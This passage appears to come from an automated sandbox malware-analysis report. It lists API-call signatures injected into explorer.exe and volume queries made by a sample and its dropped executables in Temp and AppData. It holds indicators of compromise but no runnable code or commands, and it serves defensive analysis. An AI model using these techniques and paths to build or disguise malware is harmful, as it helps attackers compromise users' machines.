              Source: C:\Windows\explorer.exeCode function: __getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,5_2_0E129234
              Source: C:\Windows\explorer.exeCode function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,5_2_0E12824C
              Source: C:\Windows\explorer.exeCode function: _calloc_crt,_malloc_crt,free,_malloc_crt,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__free_lconv_num,free,free,free,5_2_0E128AAC
              Source: C:\Windows\explorer.exeCode function: GetLocaleInfoEx,5_2_0E130370
              Source: C:\Windows\explorer.exeCode function: __getlocaleinfo,_malloc_crt,_calloc_crt,_calloc_crt,_calloc_crt,_calloc_crt,GetCPInfo,__crtLCMapStringA,__crtLCMapStringA,__crtGetStringTypeA,free,free,free,free,free,free,free,free,free,5_2_0E11F8DC
              Source: C:\Windows\explorer.exeCode function: GetLocaleInfoEx,malloc,GetLocaleInfoEx,WideCharToMultiByte,free,5_2_0E1280F0
              Source: C:\Windows\explorer.exeCode function: _getptd,GetLocaleInfoEx,GetLocaleInfoEx,TestDefaultCountry,GetLocaleInfoEx,TestDefaultCountry,_getptd,GetLocaleInfoEx,5_2_0FF69FCC
              Source: C:\Windows\explorer.exeCode function: _getptd,__lc_wcstolc,__get_qualified_locale,__lc_lctowcs,GetLocaleInfoEx,GetACP,5_2_0FF62EAC
              Source: C:\Windows\explorer.exeCode function: __crtGetLocaleInfoA,GetLastError,__crtGetLocaleInfoA,_calloc_crt,__crtGetLocaleInfoA,_calloc_crt,free,free,GetLocaleInfoEx,_calloc_crt,GetLocaleInfoEx,free,5_2_0FF60EA8
              Source: C:\Windows\explorer.exeCode function: _getptd,TranslateName,GetLocaleNameFromLangCountry,GetLocaleNameFromLanguage,TranslateName,GetLocaleNameFromLangCountry,ProcessCodePage,IsValidCodePage,GetLocaleInfoEx,GetLocaleInfoEx,GetLocaleInfoEx,_itow_s,GetLocaleNameFromLanguage,5_2_0FF6A5F0
              Source: C:\Windows\explorer.exeCode function: _calloc_crt,_malloc_crt,free,_malloc_crt,free,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__free_lconv_mon,free,free,free,free,5_2_0FF68520
              Source: C:\Windows\explorer.exeCode function: GetLocaleInfoEx,5_2_0FF6A4EC
              Source: C:\Windows\explorer.exeCode function: GetLocaleInfoEx,GetLocaleInfoEx,GetACP,5_2_0FF6A438
              Source: C:\Windows\explorer.exeCode function: GetLocaleInfoEx,5_2_0FF70370
              Source: C:\Windows\explorer.exeCode function: _calloc_crt,_malloc_crt,free,_malloc_crt,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__free_lconv_num,free,free,free,5_2_0FF68AAC
              Source: C:\Windows\explorer.exeCode function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,5_2_0FF6824C
              Source: C:\Windows\explorer.exeCode function: __getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,5_2_0FF69234
              Source: C:\Windows\explorer.exeCode function: GetLocaleInfoEx,malloc,GetLocaleInfoEx,WideCharToMultiByte,free,5_2_0FF680F0
              Source: C:\Windows\explorer.exeCode function: __getlocaleinfo,_malloc_crt,_calloc_crt,_calloc_crt,_calloc_crt,_calloc_crt,GetCPInfo,__crtLCMapStringA,__crtLCMapStringA,__crtGetStringTypeA,free,free,free,free,free,free,free,free,free,5_2_0FF5F8DC
              Source: C:\Windows\explorer.exeCode function: __getlocaleinfo,_malloc_crt,_calloc_crt,_calloc_crt,_calloc_crt,_calloc_crt,__crtLCMapStringA,__crtLCMapStringA,__crtGetStringTypeA,free,free,free,free,free,free,free,free,free,5_2_0823F211
              Source: C:\Windows\explorer.exeCode function: __getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,5_2_08248B69
              Source: C:\Windows\explorer.exeCode function: _calloc_crt,_malloc_crt,free,_malloc_crt,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__free_lconv_num,free,free,free,5_2_082483E1
              Source: C:\Windows\explorer.exeCode function: __crtGetLocaleInfoA,__crtGetLocaleInfoA,_calloc_crt,__crtGetLocaleInfoA,_calloc_crt,free,free,_calloc_crt,free,_invoke_watson,5_2_082407DD
              Source: C:\Windows\explorer.exeCode function: __crtGetLocaleInfoA,__crtGetLocaleInfoA,_calloc_crt,__crtGetLocaleInfoA,_calloc_crt,free,free,_calloc_crt,free,_invoke_watson,5_2_0DEF07DD
              Source: C:\Windows\explorer.exeCode function: _calloc_crt,_malloc_crt,free,_malloc_crt,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__free_lconv_num,free,free,free,5_2_0DEF83E1
              Source: C:\Windows\explorer.exeCode function: __getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,5_2_0DEF8B69
              Source: C:\Windows\explorer.exeCode function: __getlocaleinfo,_malloc_crt,_calloc_crt,_calloc_crt,_calloc_crt,_calloc_crt,__crtLCMapStringA,__crtLCMapStringA,__crtGetStringTypeA,free,free,free,free,free,free,free,free,free,5_2_0DEEF211
              Source: C:\Windows\explorer.exeCode function: __crtGetLocaleInfoA,__crtGetLocaleInfoA,_calloc_crt,__crtGetLocaleInfoA,_calloc_crt,free,free,_calloc_crt,free,_invoke_watson,5_2_0E0A07DD
              Source: C:\Windows\explorer.exeCode function: __getlocaleinfo,_malloc_crt,_calloc_crt,_calloc_crt,_calloc_crt,_calloc_crt,__crtLCMapStringA,__crtLCMapStringA,__crtGetStringTypeA,free,free,free,free,free,free,free,free,free,5_2_0E09F211
              Source: C:\Windows\explorer.exeCode function: __getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,5_2_0E0A8B69
              Source: C:\Windows\explorer.exeCode function: _calloc_crt,_malloc_crt,free,_malloc_crt,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__free_lconv_num,free,free,free,5_2_0E0A83E1
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exeCode function: GetProcAddress,GetLocaleInfoW,13_2_00007FFBBB89DC20
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,13_2_00007FFBBB8EFA48
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,13_2_00007FFBBB8EF8C0
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exeCode function: GetPrimaryLen,EnumSystemLocalesW,13_2_00007FFBBB8EF478
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exeCode function: GetPrimaryLen,EnumSystemLocalesW,13_2_00007FFBBB8EF3C4
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exeCode function: EnumSystemLocalesW,13_2_00007FFBBB8EF35C
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exeCode function: EnterCriticalSection,EnumSystemLocalesW,LeaveCriticalSection,13_2_00007FFBBB8ED2E0
              Source: C:\Users\user\Desktop\uFVgJVXaEU.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\uFVgJVXaEU.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\System32\audiodg.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\System32\audiodg.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\System32\msiexec.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\System32\msiexec.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\F72F.tmp.ssg.exeQueries volume information: C:\Users\user\AppData\Local\Temp\F72F.tmp.ssg.exe VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\F72F.tmp.ssg.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\F72F.tmp.ssg.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\F72F.tmp.ssg.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\F72F.tmp.ssg.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\F72F.tmp.ssg.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\F72F.tmp.ssg.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\F72F.tmp.ssg.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\F72F.tmp.ssg.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\F72F.tmp.ssg.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\F72F.tmp.ssg.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\F72F.tmp.ssg.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Roaming\2F409E82DCA61388941053\2F409E82DCA61388941053.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Roaming\2F409E82DCA61388941053\2F409E82DCA61388941053.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI81442\ucrtbase.dll VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI81442\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI81442\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI81442\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI81442\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI81442\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI81442\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI81442\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI81442\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI81442\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI81442\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI81442\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI81442\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI81442\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI81442\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI81442\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI81442\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI81442\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI81442\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI81442\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI81442\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI81442\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI81442\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI81442\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI81442\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI81442\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI81442\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI81442\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI81442\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI81442\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI81442\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exe VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exe VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI81442 VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI81442 VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI81442 VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI81442 VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI81442\_ctypes.pyd VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exe VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI81442 VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI81442\api-ms-win-core-console-l1-1-0.dll VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI81442\_hashlib.pyd VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI81442\_lzma.pyd VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI81442\_socket.pyd VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI81442\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI81442\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI81442\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI81442\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI81442\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI81442\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI81442\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI81442\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI81442\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI81442\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI81442\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI81442\base_library.zip VolumeInformationJump to behavior
